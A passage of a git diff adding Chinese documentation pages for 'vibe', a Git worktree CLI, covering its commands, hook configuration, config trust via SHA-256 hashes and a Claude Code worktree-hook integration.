+| `vibe shell-setup`                   | 输出 shell 包装函数（以及可选的补全脚本） |
+
+## 快速参考
+
+```bash
+# 为新功能创建 worktree
+vibe start feat/new-feature
+
+# 使用已有分支
+vibe start feat/existing-branch
+
+# 基于指定基础分支创建
+vibe start feat/new-feature --base main
+
+# 完成后清理
+vibe clean
+
+# 不删除当前 worktree 返回主 worktree
+vibe home
+
+# 信任配置文件
+vibe trust
+
+# 显示当前配置
+vibe config
+
+# 检查更新
+vibe upgrade
+```
+
+## 全局选项
+
+以下选项适用于大多数命令：
+
+| 选项              | 说明             |
+| ----------------- | ---------------- |
+| `-h`, `--help`    | 显示帮助信息     |
+| `-v`, `--version` | 显示版本信息     |
+| `-V`, `--verbose` | 显示详细输出     |
+| `-q`, `--quiet`   | 抑制非必要的输出 |
+
+## 详细文档
+
+- [start](/zh/commands/start/) - 创建 worktree
+- [scratch](/zh/commands/scratch/) - 创建自动命名的 scratch worktree
+- [jump](/zh/commands/jump/) - 在 worktree 之间跳转
+- [rename](/zh/commands/rename/) - 重命名当前 worktree
+- [clean](/zh/commands/clean/) - 删除 worktree
+- [home](/zh/commands/home/) - 跳转到主 worktree
+- [trust](/zh/commands/trust/) - 管理配置信任
+- [config](/zh/commands/config/) - 查看配置
+- [upgrade](/zh/commands/upgrade/) - 检查更新
+- [shell-setup](/zh/commands/shell-setup/) - 输出 shell 包装函数与 fish 补全脚本

--- a/packages/docs/src/content/docs/zh/commands/jump.mdx
+++ b/packages/docs/src/content/docs/zh/commands/jump.mdx
@@ -1,0 +1,124 @@
+---
+title: vibe jump
+description: 按分支名跳转到已有的 worktree
+sidebar:
+  order: 3
+---
+
+`jump` 命令通过匹配分支名跳转到已有的 Git Worktree。它支持精确匹配、部分匹配、模糊匹配以及交互式选择。
+
+## 使用方法
+
+```bash
+vibe jump <branch-name> [options]
+```
+
+## 选项
+
+| 选项              | 说明             |
+| ----------------- | ---------------- |
+| `-V`, `--verbose` | 显示详细输出     |
+| `-q`, `--quiet`   | 抑制非必要的输出 |
+
+## 示例
+
+```bash
+# 通过完整分支名跳转到 worktree
+vibe jump feat/new-feature
+
+# 使用部分匹配跳转
+vibe jump login
+
+# 使用模糊匹配跳转（子序列匹配）
+vibe jump feli   # 匹配 "feat/login"
+
+# 显示详细输出
+vibe jump feat/debug -V
+```
+
+## 行为
+
+### 搜索顺序
+
+`vibe jump` 按以下顺序搜索 worktree：
+
+1. **精确匹配**（区分大小写）：如果存在分支名完全一致的 worktree，立即跳转
+2. **精确匹配**（不区分大小写）：如果忽略大小写后分支名一致，跳转到该 worktree
+3. **单词边界匹配**（先区分大小写，再不区分）：如果输入出现在单词边界处（`/`、`-` 或 `_` 之后），这类匹配优先于普通的子串匹配
+4. **子串匹配**（先区分大小写，再不区分）：如果没有找到单词边界匹配，则回退到子串匹配。如果匹配到多个 worktree，会显示交互式选择提示
+5. **模糊匹配**（子序列匹配）：如果没有找到子串匹配且搜索词至少有 3 个字符，则执行子序列匹配，即搜索词的每个字符按顺序出现在分支名中（例如 `feli` 匹配 `feat/login`）。结果会通过考虑连续匹配、单词边界和匹配位置的评分算法进行排序
+6. **无匹配**：询问是否使用 `vibe start` 创建新的 worktree
+
+### 精确匹配
+
+```
+$ vibe jump feat/new-feature
+# → cd '/path/to/repo-feat-new-feature'
+```
+
+### 部分匹配
+
+```
+$ vibe jump login
+Matched: feat/login-page
+# → cd '/path/to/repo-feat-login-page'
+```
+
+### 模糊匹配
+
+```
+$ vibe jump feli
+Matched: feat/login
+# → cd '/path/to/repo-feat-login'
+```
+
+### 排除 scratch worktree
+
+带有 `scratch/` 前缀的分支（由 [`vibe scratch`](/zh/commands/scratch/) 创建）默认**被排除在单词边界匹配、子串匹配和模糊匹配之外**。这样即使 scratch 不断累积，候选列表也能保持清爽。
+
+若要跳转到 scratch worktree，可以：
+
+- 输入字面量 `scratch/` 前缀（不区分大小写）。此时 `scratch/` 下的所有分支都会成为子串/模糊匹配的候选：
+  ```
+  $ vibe jump scratch/2026
+  # → cd '/path/to/scratch-20260427-143052'
+  ```
+- 或者使用完整的分支名。精确匹配始终有效，对 scratch 也不例外。
+
+### 多个匹配
+
+```
+$ vibe jump auth
+Multiple worktrees match 'auth':
+  1. feat/auth-login (/path/to/repo-feat-auth-login)
+  2. feat/auth-logout (/path/to/repo-feat-auth-logout)
+  3. Cancel
+Please select (enter number):
+```
+
+### 无匹配（回退）
+
+```
+$ vibe jump feat/nonexistent
+No worktree found for 'feat/nonexistent'. Create one with 'vibe start'? (Y/n)
+```
+
+确认后会调用 `vibe start` 来创建 worktree。
+
+## 退出码
+
+| 退出码 | 条件                                 |
+| ------ | ------------------------------------ |
+| `0`    | 跳转成功，或用户主动取消             |
+| `1`    | 错误（分支名为空、git 命令执行失败） |
+
+用户主动取消（在选择提示中选择“取消”，或拒绝创建新的 worktree）会被视为成功退出，而不是错误。
+
+## 限制
+
+- **游离 HEAD 的 worktree**：处于游离 HEAD 状态（未关联分支）的 worktree 不会包含在搜索范围内。只有带分支引用的 worktree 才可被搜索。
+
+## 相关内容
+
+- [start](/zh/commands/start/) - 创建新的 worktree
+- [clean](/zh/commands/clean/) - 完成后删除 worktree

--- a/packages/docs/src/content/docs/zh/commands/rename.mdx
+++ b/packages/docs/src/content/docs/zh/commands/rename.mdx
@@ -1,0 +1,109 @@
+---
+title: vibe rename
+description: 重命名当前 worktree 的分支和目录
+sidebar:
+  order: 3
+---
+
+`rename` 命令会重命名当前 worktree 的分支并移动其目录。它的主要用途是：当由 [`vibe scratch`](/zh/commands/scratch/) 创建的 scratch worktree 中的工作逐渐成形后，将其提升为正式的名称。
+
+## 使用方法
+
+```bash
+vibe rename <new-name> [options]
+```
+
+## 选项
+
+| 选项              | 说明                 |
+| ----------------- | -------------------- |
+| `-n`, `--dry-run` | 预览操作而不实际执行 |
+| `-V`, `--verbose` | 显示详细输出         |
+| `-q`, `--quiet`   | 抑制非必要的输出     |
+
+## 示例
+
+```bash
+# 将当前 scratch 提升为正式名称
+vibe rename my-feature
+
+# 预览而不实际应用
+vibe rename my-feature --dry-run
+
+# 重命名任意（未推送的）worktree
+cd /path/to/scratch-20260427-143052
+vibe rename feat/login
+```
+
+输出：
+
+```
+$ vibe rename my-feature
+Renamed scratch/20260427-143052 -> my-feature
+Directory: /path/to/scratch-20260427-143052 -> /path/to/repo-my-feature
+# → cd '/path/to/repo-my-feature'
+```
+
+## 行为
+
+`vibe rename` 会执行两个操作：
+
+1. `git worktree move <old-path> <new-path>` —— 重命名目录
+2. `git branch -m <old-name> <new-name>` —— 重命名分支
+
+两者都成功后，vibe 会更新内部的 MRU 记录，并向 shell 包装函数输出 `cd` 命令，把你带入重命名后的 worktree。
+
+### 不支持已推送的分支
+
+如果当前分支存在远程 upstream（即已被推送），`vibe rename` 会中止操作，并打印出你需要手动执行的确切 git 命令：
+
+```
+$ vibe rename my-feature
+Error: branch 'scratch/20260427-143052' is pushed to 'origin'
+vibe rename does not handle pushed branches to avoid remote divergence.
+To rename manually:
+  git branch -m scratch/20260427-143052 my-feature
+  git push origin -u my-feature
+  git push origin --delete scratch/20260427-143052
+  # then move the worktree directory yourself
+```
+
+这样可以让 vibe 的行为保持简单且可预测。重命名带远程跟踪的分支应当由用户自觉地直接使用 git 来完成。
+
+本地跟踪分支（即 `branch.<name>.remote = "."`）**不会**被视为已推送，重命名会正常进行。
+
+### 冲突检测
+
+如果目标名称已被占用，`vibe rename` 会中止：
+
+- 存在同名的分支
+- 存在使用该新目录路径的 worktree
+
+### 拒绝在主 worktree 中执行
+
+`vibe rename` 无法在主 worktree（仓库的主检出目录）中运行。移动目录会导致整个仓库被搬迁，这是不安全的。如果你确实需要这样做，请直接使用 `git`。
+
+### 同名时为空操作
+
+如果 `vibe rename` 使用与当前分支相同的名称执行，则为空操作：vibe 会打印 `Already named '<name>'`，并针对当前路径输出 `cd` 命令。
+
+### 失败恢复
+
+如果 `git worktree move` 成功但 `git branch -m` 失败，vibe 会尝试回滚目录移动。如果回滚也失败，vibe 会打印手动恢复命令并以退出码 1 结束。
+
+### MRU 更新
+
+如果你的 worktree 已被记录在 MRU 列表中（`vibe jump` 用它来排序），该条目会被更新为新的路径和分支名。时间戳会被保留，因此 MRU 的排序不会改变。
+
+## 退出码
+
+| 退出码 | 条件                                                            |
+| ------ | --------------------------------------------------------------- |
+| `0`    | 重命名成功，或同名的空操作                                      |
+| `1`    | 错误（名称为空、主 worktree、已推送的分支、冲突、git 执行失败） |
+
+## 相关内容
+
+- [scratch](/zh/commands/scratch/) - 创建自动命名的 worktree
+- [start](/zh/commands/start/) - 使用显式名称创建 worktree
+- [jump](/zh/commands/jump/) - 在 worktree 之间跳转

--- a/packages/docs/src/content/docs/zh/commands/scratch.mdx
+++ b/packages/docs/src/content/docs/zh/commands/scratch.mdx
@@ -1,0 +1,92 @@
+---
+title: vibe scratch
+description: 使用自动生成的 scratch 分支名创建 worktree
+sidebar:
+  order: 2
+---
+
+`scratch` 命令会使用自动生成的 `scratch/<timestamp>` 分支名创建 Git Worktree。它与 `vibe start` 相同，但省去了事先取名的麻烦 —— 非常适合“先随便试试”的场景。
+
+## 使用方法
+
+```bash
+vibe scratch [options]
+```
+
+## 选项
+
+除了 `--claude-code-worktree-hook` 之外，`vibe scratch` 接受与 [`vibe start`](/zh/commands/start/) 相同的选项。
+
+| 选项              | 说明                               |
+| ----------------- | ---------------------------------- |
+| `--reuse`         | 使用已有分支（很少有实际意义）     |
+| `--base <ref>`    | 新分支的基础分支/提交              |
+| `--track`         | 使用 `--base` 时设置 upstream 跟踪 |
+| `--no-hooks`      | 跳过 pre-start 和 post-start 钩子  |
+| `--no-copy`       | 跳过文件和目录的复制               |
+| `-n`, `--dry-run` | 预览操作而不实际执行               |
+| `-V`, `--verbose` | 显示详细输出                       |
+| `-q`, `--quiet`   | 抑制非必要的输出                   |
+
+## 示例
+
+```bash
+# 创建 scratch worktree
+vibe scratch
+
+# 基于指定的基础分支创建
+vibe scratch --base develop
+
+# 不执行钩子的快速 scratch
+vibe scratch --no-hooks
+```
+
+输出：
+
+```
+$ vibe scratch
+Created worktree: scratch/20260427-143052
+Promote with: vibe rename <new-name>
+```
+
+## 行为
+
+### 分支命名
+
+生成的分支名为本地时间的 `scratch/<YYYYMMDD-HHMMSS>`。该格式具有以下特点：
+
+- **可排序**：最新的 worktree 在 `vibe list` 中排在最前
+- **可预期**：将 worktree 与你开始工作的时间关联起来
+- **不冲突**：如果同一秒内出现两次（实际中很罕见），会追加 `-2`、`-3`……
+
+### 与 `vibe start` 相同的流程
+
+名称生成之后，`vibe scratch` 会执行与 `vibe start` 完全相同的流程：
+
+1. 在源仓库中执行 **pre-start 钩子**
+2. **创建 worktree**
+3. **复制文件**
+4. 在新 worktree 中执行 **post-start 钩子**
+5. **切换目录**到新的 worktree
+
+成功后，vibe 会打印一条指向 [`vibe rename`](/zh/commands/rename/) 的提示，方便你在工作成形后把 scratch 提升为正式名称。
+
+### 何时提升
+
+如果 scratch 产出了值得保留的成果，请在该 worktree 内执行 `vibe rename <name>`：
+
+```bash
+$ cd /path/to/scratch-20260427-143052
+$ vibe rename my-feature
+Renamed scratch/20260427-143052 -> my-feature
+```
+
+### 清理
+
+使用 `vibe clean` 删除不再需要的 scratch。scratch 没有任何特殊待遇 —— 它们的行为与其他 worktree 完全一致。
+
+## 相关内容
+
+- [start](/zh/commands/start/) - 使用显式名称创建 worktree
+- [rename](/zh/commands/rename/) - 将 scratch 提升为正式名称
+- [clean](/zh/commands/clean/) - 完成后删除 worktree

--- a/packages/docs/src/content/docs/zh/commands/shell-setup.mdx
+++ b/packages/docs/src/content/docs/zh/commands/shell-setup.mdx
@@ -1,0 +1,98 @@
+---
+title: vibe shell-setup
+description: 输出用于 eval 的 shell 包装函数（以及可选的自动补全脚本）
+sidebar:
+  order: 10
+---
+
+`shell-setup` 命令会输出一个 shell 包装函数，使 vibe 能够在创建或清理 worktree 之后切换你当前的工作目录。它还可以在包装函数之后一并输出 fish 或 zsh 的自动补全脚本。
+
+## 使用方法
+
+```bash
+vibe shell-setup
+vibe shell-setup --shell <name>
+vibe shell-setup --shell fish --with-completion
+vibe shell-setup --shell zsh --with-completion
+```
+
+默认情况下，该命令会从 `$SHELL` 检测你的 shell，并将包装函数输出到 stdout。请将输出通过管道传给 `eval`（bash / zsh）或 `source`（fish）—— 各 shell 的安装片段请参阅 [Shell 设置](/zh/setup/)。
+
+## 选项
+
+### `--shell <name>`
+
+强制输出指定 shell 的内容，跳过 `$SHELL` 检测。支持的取值：`bash`、`zsh`、`fish`、`nushell`、`powershell`。
+
+```bash
+vibe shell-setup --shell zsh
+```
+
+### `--with-completion`
+
+在包装函数之后追加 shell 自动补全脚本。目前支持 `fish` 和 `zsh`；与 `bash`/`nushell`/`powershell` 一起使用会以错误退出。
+
+```bash
+vibe shell-setup --shell fish --with-completion | source
+eval "$(vibe shell-setup --shell zsh --with-completion)"
+```
+
+补全脚本涵盖以下内容：
+
+- 所有子命令及其描述（`vibe <Tab>`）
+- 各子命令的选项（`vibe start --<Tab>`）
+- `vibe start <Tab>` 的本地分支名（通过 `git for-each-ref refs/heads`）
+- `vibe jump <Tab>` 的 worktree 分支名（通过 `git worktree list --porcelain`）
+
+> zsh 用户必须在 `~/.zshrc` 中的 `eval` 行之前调用 `autoload -Uz compinit && compinit`。如果 `compinit` 未执行，补全的注册会被静默跳过，但 `vibe` 包装函数仍会被定义。
+
+### `-V`, `--verbose`
+
+除了在 stdout 输出包装函数外，还会在 stderr 显示检测到的 shell。
+
+```bash
+vibe shell-setup --verbose
+```
+
+### `-q`, `--quiet`
+
+抑制非必要的输出。
+
+## 行为
+
+stdout 输出的是包装函数（指定 `--with-completion` 时还包括补全脚本），因此可以直接通过管道传给 `eval` / `source` 而无需额外解析。日志、警告和错误都输出到 stderr，因此绝不会混入 eval 管道。
+
+如果无法检测 `$SHELL` 且未指定 `--shell`，该命令会以退出码 1 结束，并将错误输出到 stderr。
+
+### Nushell 和 PowerShell 的包装函数
+
+从 vibe 2.2.0 起，为 `nushell` 和 `powershell` 输出的包装函数会传递内部的
+`--eval-dialect` 选项，使二进制文件以该 shell 自身的语法输出目录切换命令。
+因此这两个包装函数需要配套的二进制文件（2.2.0 或更高版本）—— 对于较旧的二进制文件，
+该选项会被拒绝，命令将以退出码 2 结束且不执行任何操作。
+
+已经写入你 rc 文件的包装函数**不会**在升级时自动重新生成。如果你粘贴的是较旧的
+nushell 或 powershell 片段，它会保持原有行为 —— 在 nushell 上从不切换目录，在
+PowerShell 上错误处理带引号的路径 —— 直到你重新执行 `vibe shell-setup` 并替换它。
+`bash`、`zsh` 和 `fish` 的包装函数没有变化。
+
+## 示例
+
+```bash
+# 自动检测 shell（zsh / bash 风格）
+eval "$(vibe shell-setup)"
+
+# 强制输出 fish 的包装函数
+vibe shell-setup --shell fish | source
+
+# 一行完成 fish 包装函数 + Tab 补全
+vibe shell-setup --shell fish --with-completion | source
+
+# 一行完成 zsh 包装函数 + Tab 补全（需要事先执行 compinit）
+eval "$(vibe shell-setup --shell zsh --with-completion)"
+```
+
+## 相关内容
+
+- [Shell 设置](/zh/setup/) - 各 shell 的完整设置说明
+- [安装](/zh/installation/) - 安装 vibe 并配置你的 shell

--- a/packages/docs/src/content/docs/zh/commands/start.mdx
+++ b/packages/docs/src/content/docs/zh/commands/start.mdx
@@ -1,0 +1,118 @@
+---
+title: vibe start
+description: 使用新建或已有分支创建 worktree
+sidebar:
+  order: 2
+---
+
+import { Badge } from "@astrojs/starlight/components";
+
+`start` 命令会为指定分支创建 Git Worktree，并切换到该目录。
+
+## 使用方法
+
+```bash
+vibe start <branch> [options]
+```
+
+## 选项
+
+| 选项                          | 说明                                |                           |
+| ----------------------------- | ----------------------------------- | ------------------------- |
+| `--reuse`                     | 使用已有分支（不新建）              |                           |
+| `--base <ref>`                | 新分支的基础分支/提交               |                           |
+| `--track`                     | 使用 --base 时设置 upstream 跟踪    |                           |
+| `--no-hooks`                  | 跳过 pre-start 和 post-start 钩子   | <Badge text="v0.5.0+" />  |
+| `--no-copy`                   | 跳过文件和目录的复制                | <Badge text="v0.5.0+" />  |
+| `-n`, `--dry-run`             | 预览操作而不实际执行                | <Badge text="v0.8.0+" />  |
+| `-f`, `--force`               | 跳过确认提示                        | <Badge text="v2.0.0+" />  |
+| `-V`, `--verbose`             | 显示详细输出                        | <Badge text="v0.8.0+" />  |
+| `-q`, `--quiet`               | 抑制非必要的输出                    | <Badge text="v0.8.0+" />  |
+| `--claude-code-worktree-hook` | Claude Code WorktreeCreate 钩子模式 | <Badge text="v0.23.0+" /> |
+
+注意：`--base` 仅在创建新分支时生效。如果分支已存在，则会被忽略。默认情况下 `--base` 不会设置 upstream 跟踪，需要设置时请使用 `--track`。
+
+注意：`--claude-code-worktree-hook` 由 Claude Code 的 WorktreeCreate 钩子在内部使用。配置详情请参阅 [Claude Code 集成](/zh/configuration/hooks/#claude-code-integration)。
+
+## 示例
+
+```bash
+# 使用新分支创建 worktree
+vibe start feat/new-feature
+
+# 使用已有分支
+vibe start feat/existing-branch
+
+# 基于基础分支创建新分支
+vibe start feat/from-main --base main
+
+# 不执行钩子快速开始
+vibe start feat/quick-fix --no-hooks
+
+# 不复制文件直接开始
+vibe start feat/clean-slate --no-copy
+
+# 预览将要执行的操作（短选项）
+vibe start feat/preview -n
+
+# 显示详细输出
+vibe start feat/debug -V
+
+# 抑制输出
+vibe start feat/silent -q
+```
+
+## 行为
+
+### 幂等操作
+
+`vibe start` 是幂等的 —— 对同一分支多次执行是安全的：
+
+- 如果同一分支的 worktree 已存在，vibe 会直接跳转过去
+- 不会创建重复的 worktree
+
+### 交互式提示
+
+`vibe start` 会以交互方式处理各种情况：
+
+#### 分支正被其他 worktree 使用
+
+```
+$ vibe start feat/new-feature
+分支 'feat/new-feature' 已被 worktree '/path/to/repo-feat-new-feature' 使用。
+是否跳转到已有的 worktree? (Y/n)
+```
+
+#### 目录已存在但分支不同
+
+你可以从以下选项中选择：
+
+- **覆盖**：删除并重新创建 worktree
+- **复用**：直接使用已有目录
+- **取消**：中止操作
+
+指定 `--force` 时，vibe 会跳过这些提示。如果分支已被其他 worktree 使用，vibe 会跳转到该 worktree。如果目标目录是其他分支的 worktree，vibe 会覆盖它并创建所请求的 worktree。
+
+### Worktree 的位置
+
+默认情况下，worktree 会作为主仓库的同级目录创建：
+
+```
+/path/to/repo/           # 主仓库
+/path/to/repo-feat-new-feature/  # worktree
+```
+
+## 工作流程
+
+执行 `vibe start` 时：
+
+1. **pre-start 钩子**在源仓库中执行（如已配置）
+2. **创建 worktree**：创建 Git worktree
+3. **复制文件**：复制文件/目录（如已配置）
+4. **post-start 钩子**在新 worktree 中执行（如已配置）
+5. **切换目录**：终端切换到新的 worktree
+
+## 相关内容
+
+- [clean](/zh/commands/clean/) - 完成后删除 worktree
+- [钩子](/zh/configuration/hooks/) - 配置自动化工作流

--- a/packages/docs/src/content/docs/zh/commands/trust.mdx
+++ b/packages/docs/src/content/docs/zh/commands/trust.mdx
@@ -1,0 +1,75 @@
+---
+title: vibe trust / untrust
+description: 管理配置文件的信任状态
+sidebar:
+  order: 4
+---
+
+`trust` 和 `untrust` 命令用于管理配置文件的信任状态。
+
+## 使用方法
+
+```bash
+# 信任配置文件
+vibe trust
+
+# 取消对配置文件的信任
+vibe untrust
+```
+
+## 为什么需要信任？
+
+vibe 使用 SHA-256 哈希校验来确保配置文件未被篡改。这可以防止恶意脚本通过钩子被执行。
+
+### 信任流程
+
+1. **首次使用**：执行 `vibe trust` 来登记 `.vibe.toml` 和 `.vibe.local.toml` 的哈希值
+2. **后续运行**：vibe 会在执行任何钩子之前校验哈希值
+3. **文件变更**：如果文件发生变更，你需要重新执行 `vibe trust`
+
+## vibe trust
+
+通过保存当前配置文件的 SHA-256 哈希值，将其登记为受信任。
+
+```bash
+$ vibe trust
+Trusted .vibe.toml (hash: abc123...)
+Trusted .vibe.local.toml (hash: def456...)
+```
+
+### 被信任的对象
+
+- `.vibe.toml`（如果存在）
+- `.vibe.local.toml`（如果存在）
+
+## vibe untrust
+
+取消对当前仓库中配置文件的信任。
+
+```bash
+$ vibe untrust
+Untrusted .vibe.toml
+Untrusted .vibe.local.toml
+```
+
+## 哈希校验
+
+### 哈希不匹配时
+
+如果配置文件在被信任之后发生了修改：
+
+```bash
+$ vibe start feat/new-feature
+Error: .vibe.toml hash mismatch.
+The file has been modified since last trusted.
+Run 'vibe trust' to re-trust the file.
+```
+
+### 多个哈希值
+
+vibe 会为每个文件保存多个哈希值（最多 100 个），因此只要每个分支的版本都被信任过一次，你就可以在分支之间切换而无需重新信任。
+
+## 相关内容
+
+- [安全](/zh/security/) - 哈希校验的详细说明
+- [配置](/zh/configuration/) - 配置文件格式

--- a/packages/docs/src/content/docs/zh/commands/upgrade.mdx
+++ b/packages/docs/src/content/docs/zh/commands/upgrade.mdx
@@ -1,0 +1,87 @@
+---
+title: vibe upgrade
+description: 检查更新并显示升级方法
+sidebar:
+  order: 5
+---
+
+`upgrade` 命令会检查新版本，并根据你的安装方式显示相应的升级方法。
+
+## 使用方法
+
+```bash
+vibe upgrade
+```
+
+## 选项
+
+### `--check`
+
+仅检查是否有新版本可用，不显示升级方法。
+
+```bash
+vibe upgrade --check
+```
+
+### `-V`, `--verbose`
+
+显示详细输出，包括所访问的 registry URL。
+
+```bash
+vibe upgrade --verbose
+```
+
+### `-q`, `--quiet`
+
+抑制非必要的输出。仅在有可用更新时才显示内容。
+
+```bash
+vibe upgrade --quiet
+```
+
+## 行为
+
+### 版本检查
+
+该命令会从 npm registry 获取最新版本，并与你当前的版本进行比较：
+
+```
+$ vibe upgrade
+vibe 0.8.0
+
+A new version is available: 0.8.1
+
+To upgrade:
+  brew upgrade kexi/tap/vibe
+
+Release notes:
+  https://github.com/kexi/vibe/releases/tag/v0.8.1
+```
+
+### 安装方式的自动检测
+
+vibe 会自动检测它的安装方式，并显示相应的升级命令：
+
+| 方式     | 升级命令                                   |
+| -------- | ------------------------------------------ |
+| npm      | `npm install -g @kexi/vibe@latest`         |
+| Homebrew | `brew upgrade kexi/tap/vibe`               |
+| Deb      | `sudo apt update && sudo apt upgrade vibe` |
+| Binary   | 显示 GitHub releases 的下载链接            |
+| Dev      | `pnpm run build:rust`                      |
+
+### 已是最新版本
+
+如果你已经在使用最新版本：
+
+```
+$ vibe upgrade
+vibe 0.8.0
+
+You are using the latest version.
+```
+
+## 相关内容
+
+- [安装](/zh/installation/) - 安装方式
+- [变更历史](/zh/changelog/) - 版本历史

--- a/packages/docs/src/content/docs/zh/configuration/hooks.mdx
+++ b/packages/docs/src/content/docs/zh/configuration/hooks.mdx
@@ -1,0 +1,227 @@
+---
+title: 钩子
+description: 配置钩子以实现自动化工作流
+sidebar:
+  order: 4
+---
+
+通过钩子，你可以在 worktree 生命周期中自动执行命令。
+
+## 可用的钩子
+
+| 钩子         | 执行时机          | 工作目录      |
+| ------------ | ----------------- | ------------- |
+| `pre_start`  | worktree 创建之后 | 源仓库        |
+| `post_start` | worktree 创建之后 | 新的 worktree |
+| `pre_clean`  | worktree 删除之前 | 当前 worktree |
+| `post_clean` | worktree 删除之后 | 主仓库        |
+
+## 配置
+
+```toml
+[hooks]
+pre_start = ["echo '正在准备 worktree...'"]
+post_start = [
+  "pnpm install",
+  "pnpm db:migrate"
+]
+pre_clean = ["git stash"]
+post_clean = ["echo '清理完成'"]
+```
+
+## 环境变量
+
+所有钩子命令中都可以使用以下环境变量：
+
+| 变量                 | 说明                       |
+| -------------------- | -------------------------- |
+| `VIBE_WORKTREE_PATH` | 所创建 worktree 的绝对路径 |
+| `VIBE_ORIGIN_PATH`   | 源仓库的绝对路径           |
+
+### 使用示例
+
+```toml
+[hooks]
+post_start = [
+  "echo 'Worktree 创建于: $VIBE_WORKTREE_PATH'",
+  "echo '源仓库: $VIBE_ORIGIN_PATH'"
+]
+```
+
+## 钩子的输出行为
+
+vibe 会在钩子执行期间显示实时的进度树：
+
+```
+✶ Setting up worktree feature/new-ui…
+┗ ☒ Pre-start hooks
+   ┗ ☒ npm install
+     ☒ cargo build --release
+  ⠋ Copying files
+   ┗ ⠋ .env.local
+     ☐ node_modules/
+```
+
+### 输出处理
+
+| 情况         | 标准输出       | 标准错误 |
+| ------------ | -------------- | -------- |
+| 进度显示启用 | 被抑制         | 始终显示 |
+| 进度显示禁用 | 输出到标准错误 | 始终显示 |
+| 钩子执行失败 | N/A            | 始终显示 |
+
+:::note
+在非 TTY 环境（例如 CI/CD）中，进度显示会自动禁用，钩子的输出将正常显示。
+:::
+
+## 钩子的执行顺序
+
+对于 `vibe start`：
+
+1. 创建 worktree
+2. 当配置了 `[submodules] configs = [...]` 时，初始化列出的子模块
+3. 各个列出的子模块中已信任的 `pre_start`、copy 规则和 `post_start` 会以该子模块根目录为基准执行
+4. 父仓库的 `pre_start` 钩子在源仓库中执行
+5. 复制父仓库的文件/目录
+6. 父仓库的 `post_start` 钩子在新的 worktree 中执行
+
+对于 `vibe clean`：
+
+1. `pre_clean` 钩子在当前 worktree 中执行
+2. 删除 worktree
+3. `post_clean` 钩子在主仓库中执行
+
+## 常见模式
+
+### Node.js 项目
+
+```toml
+[hooks]
+post_start = [
+  "pnpm install",
+  "pnpm build"
+]
+pre_clean = ["git stash --include-untracked"]
+```
+
+### Bun 项目
+
+```toml
+[hooks]
+post_start = [
+  "bun install",
+  "bun run build"
+]
+pre_clean = ["git stash --include-untracked"]
+```
+
+### 数据库迁移
+
+```toml
+[hooks]
+post_start = [
+  "pnpm install",
+  "pnpm db:migrate",
+  "pnpm db:seed"
+]
+```
+
+### Docker 环境
+
+```toml
+[hooks]
+post_start = [
+  "docker-compose up -d",
+  "sleep 5",
+  "pnpm db:migrate"
+]
+pre_clean = ["docker-compose down"]
+```
+
+### Git 子模块
+
+当某个直接子模块有自己的 setup 文件或钩子时，请使用一等公民的子模块配置：
+
+```toml
+[submodules]
+configs = ["libs/foo"]
+```
+
+这会在新的 worktree 中执行 `git submodule update --init -- libs/foo`，然后通过常规的 trust store 加载 `libs/foo/.vibe.toml`。该子模块的 copy 规则和钩子会以 `libs/foo` 为基准解析路径，并在父仓库的 `pre_start` 钩子之前执行。
+
+:::note
+如果你需要自定义的子模块行为，例如递归更新、过滤更新，或有意忽略失败，请改用钩子。
+:::
+
+## 跳过钩子
+
+你可以使用 `--no-hooks` 选项跳过钩子：
+
+```bash
+vibe start feat/quick-fix --no-hooks
+```
+
+## Claude Code 集成
+
+vibe 可以与 [Claude Code](https://claude.ai/code) 的 `WorktreeCreate` 和 `WorktreeRemove` 钩子集成。这会把 Claude Code 默认的 `git worktree add` 行为替换为 vibe 的完整工作流，包括钩子、CoW 文件复制和配置。
+
+### 设置
+
+在 Claude Code 的 `settings.json` 中添加以下内容：
+
+```json
+{
+  "hooks": {
+    "WorktreeCreate": [
+      {
+        "hooks": [
+          {
+            "type": "command",
+            "command": "vibe start --claude-code-worktree-hook --quiet 2>/dev/null"
+          }
+        ]
+      }
+    ],
+    "WorktreeRemove": [
+      {
+        "hooks": [
+          {
+            "type": "command",
+            "command": "vibe clean --claude-code-worktree-hook --force 2>/dev/null"
+          }
+        ]
+      }
+    ]
+  }
+}
+```
+
+### 工作原理
+
+当 Claude Code 创建 worktree 时（通过自然语言、`isolation: "worktree"` 或 `/worktree` 命令），vibe 会接管完整的生命周期：
+
+**WorktreeCreate:**
+
+1. 从 stdin 读取 worktree 名称（Claude Code 钩子协议）
+2. 创建 git worktree
+3. 当配置了 `[submodules] configs = [...]` 时，初始化列出的子模块并执行其已信任的 setup
+4. 在源仓库中执行父仓库的 `pre_start` 钩子
+5. 使用 CoW 复制父仓库的文件/目录
+6. 在新的 worktree 中执行父仓库的 `post_start` 钩子（例如 `pnpm install`）
+7. 将 worktree 路径输出到 stdout 供 Claude Code 使用
+
+**WorktreeRemove:**
+
+1. 从 stdin 读取 worktree 路径（Claude Code 钩子协议）
+2. 在 worktree 中执行 `pre_clean` 钩子
+3. 删除 git worktree
+4. 在主仓库中执行 `post_clean` 钩子
+
+### 优势
+
+如果没有该集成，Claude Code 创建 worktree 时只会执行 `git worktree add`。借助 vibe 的钩子，你可以获得：
+
+- **自动安装依赖**（`pnpm install`、`bun install` 等）
+- **CoW 文件复制**（`.env`、`node_modules` 等）
+- **自定义 setup 脚本**（数据库迁移、Docker 容器等）
+- **worktree 删除时的清理钩子**

--- a/packages/docs/src/content/docs/zh/configuration/index.mdx
+++ b/packages/docs/src/content/docs/zh/configuration/index.mdx
@@ -1,0 +1,54 @@
+---
+title: 配置概览
+description: 使用 .vibe.toml 配置 vibe
+sidebar:
+  order: 1
+---
+
+vibe 可以通过 TOML 文件进行配置，从而自动化创建和清理 worktree 时的工作流。
+
+## 配置文件
+
+| 文件               | 用途             | 位置              | 是否纳入 Git 管理    |
+| ------------------ | ---------------- | ----------------- | -------------------- |
+| `.vibe.toml`       | 团队共享配置     | 仓库根目录        | 是                   |
+| `.vibe.local.toml` | 个人本地覆盖配置 | 仓库根目录        | 否（已被 gitignore） |
+| `settings.json`    | 用户级全局设置   | `~/.config/vibe/` | 否（位于用户主目录） |
+
+## 基本示例
+
+在仓库根目录创建 `.vibe.toml` 文件：
+
+```toml
+# 将文件和目录从源仓库复制到 worktree
+[copy]
+files = [".env"]
+dirs = ["node_modules", ".cache"]
+
+# worktree 创建后要执行的命令
+[hooks]
+pre_start = ["echo '正在准备 worktree...'"]
+post_start = [
+  "pnpm install",
+  "pnpm db:migrate"
+]
+pre_clean = ["git stash"]
+post_clean = ["echo '清理完成'"]
+```
+
+## 首次设置
+
+在使用配置文件之前，需要先信任它们：
+
+```bash
+vibe trust
